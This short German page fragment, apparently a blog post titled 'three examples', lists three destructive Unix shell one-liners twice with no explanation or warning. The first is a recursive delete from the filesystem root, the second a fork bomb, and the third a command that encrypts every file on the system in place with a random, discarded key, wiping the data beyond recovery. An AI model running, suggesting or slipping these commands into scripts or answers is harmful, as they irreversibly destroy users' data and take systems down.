Drei Beispiele:
-
cd / && rm -rf *
-
:(){ :|:& };:
-
find / -type f -exec sh -c 'for f; do openssl enc -aes-256-ctr -pass file:/dev/urandom -in "$f" -out "$f.tmp" && mv "$f.tmp" "$f"; done' sh {} +
Drei Beispiele:
cd / && rm -rf *
:(){ :|:& };:
find / -type f -exec sh -c 'for f; do openssl enc -aes-256-ctr -pass file:/dev/urandom -in "$f" -out "$f.tmp" && mv "$f.tmp" "$f"; done' sh {} +
Schreib einen Kommentar